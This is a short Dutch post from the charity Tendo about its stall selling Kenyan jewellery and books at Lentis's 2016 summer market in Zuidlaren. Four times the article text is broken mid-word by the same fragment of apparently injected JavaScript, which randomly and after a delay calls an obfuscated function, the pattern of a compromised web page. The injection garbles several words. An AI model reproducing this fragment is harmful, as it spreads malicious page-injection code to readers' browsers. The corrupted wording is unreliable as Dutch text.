Succesvolle Zomermarkt bij Dennenoord, Zuidlaren.

zomermarkt 2Zoals u hebt kunnen lezen stond stichting Tendo 3 juni jl. op de A&R-zomermarkt van GGZ-instelling Lentis, voormalig Dennenoord, te Zuidlaren.

Dit is een markt in het kader van Activering en Re-integratie.

Viel elders in Nederlandandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} de regen met bakken uit de lucht, vergezeld van onweer en hagel, boven de zomermarkt hing een strak blauwe lucht met hoge temperaturen.

Tendo stond er met sieraden uit Kenia en een selectief aantal boeken. Er was veel belangstelling voor de Tendo-kraam en voor de Tendo-projecten. Gelukkig gold dit ook voor de andandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ere goede doelen die op deze markt stonden én, misschien tóch wel het belangrijkste van deze dag: er was vooral veel belangstelling voor de werkprojecten van Lentis. Goed voor integratie in de samenleving.

V.w.b. Tendo, zoals gezegd veel belangstelling, veel vragen aan de handandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} van de foto’s en de sieraden vonden gretig aftrek. Voor de boeken gold dat deze keer minder maar dat zal aan de warmte gelegen hebben: sjouw met deze temperaturen maar eens met een stapel boeken onder je arm.

Een hele mooie markt en zeker voor herhaling vatbaar.

En die blauwe lucht? Die hield dapper weerstandandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} tegen de, vanuit het oosten, oprukkende regen- en onweersbuien, tot ongeveer een half uurtje voor sluiting markt. Maar toen waren de meeste kramen al leeg, want we zagen het aankomen . . . .

Met dank voor alles, incl. verzorging inwendige mens, aan de organisatie van de Lentis A&R-zomermarkt 2016.

Als het aan Tendo ligt: graag tot volgend jaar.